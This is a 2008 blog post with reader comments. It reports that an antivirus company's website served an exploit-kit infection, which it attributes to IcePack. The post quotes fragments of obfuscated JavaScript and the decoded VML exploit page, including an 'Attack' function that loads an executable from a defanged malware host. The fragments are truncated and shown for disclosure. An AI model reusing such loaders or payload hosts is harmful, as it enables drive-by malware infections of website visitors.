Antivirus company website is infected!!!
UPDATE(08/02): Malicious IFRAME has been removed . So Web-admins  should have knowledge of all various method of attacks  and keep update & audit their site/server.
What do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website.Â
The same happened to Delhi (India) based AVsoft Technologies’s antivirus website http://www.s-cop.com.
Their product “SmartCop Antivirus” is capable to detect malwares!
Infection is carried by exploiting common vulnerabilites using encrypted script. In this case it is like
<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,46,55,34,16,14,60,58,0,0,0,0,0,0,18,24,29,45,6,38,48,41,61,50,33,17);for(j=Math.ceil(l/b);j>0;j–){r=”;for(i=Math.min(l,b);i>0;i–,l–){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc(“gPjEXVXIadA4ie8IN0zSARiSdT8eNqcLfhpMNhiIpq8vnqCIoVX5DypIW……….
which decryptes to
<html xmlns:v=”urn:schemas-microsoft-com:vml”><head>
<object id=”VMLRender” classid=”CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E”>
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body><div id=”myDivA”></div>Â
<script language=”JavaScript”>Â Â
 function bxdbSGIA(Z0gP3oql, Bwpp5g4P)
 {
  while (Z0gP3oql.length*2<Bwpp5g4P)  ….
function Attack(n)
 {…
‘<param name=”src” value=” http://ntkrnlpa[dot]info/rc/exe[dot]
………
Just see the screenshots below…
This all is used by the infamous (underground networks!!) tool “IcePack” . You can see below the admin console
Already reported to concerned authorities.
K\'LL3r 
February 8, 2008 at 11:01 am
Empresa de antivirus infecta a sus propios clientes (ENG)
Empresa india que comercializa el antivirus SmartCop Antivirus, lo capa para que no detecte malware y hace uso de una vulnerabilidad para usar un script encriptado para colarles a sus clientes el soft IcePack, que es una herramienta para instalar malwa…
February 8, 2008 at 12:40 pm
Hay otros las porciones de la herramienta que hacen las mismas cosas como MPack, FirePack, la necesidad de WebAttackers..The es haber puesto al dÃa softwares y asegurar el código que programa de modo que ninguna inyección de la IRF o del código
February 27, 2008 at 5:56 am
[…] Sarah wrote an interesting post today onHere’s a quick excerptWhat do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website. The same happened to Delhi (India) based … […]
May 24, 2008 at 7:59 am
[…] What do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website.
The same happened to Delhi (India) based AVsoft Technologies’s antivirus […]
May 2, 2009 at 12:15 pm
I must say, I could not agree with you in 100%, but it’s just my opinion, which indeed could be wrong.
p.s. You have a very good template . Where did you find it?
May 2, 2009 at 12:18 pm
That’s an interesting article. I just wondered if you could tell me where to find more info on this topic ?
February 27, 2010 at 8:45 pm
Really nice post. Very Informative and helpful post.
November 24, 2010 at 10:48 pm
Thank you. Awesome submissions you have here. Got some extra sites to direct to which have a bit more info?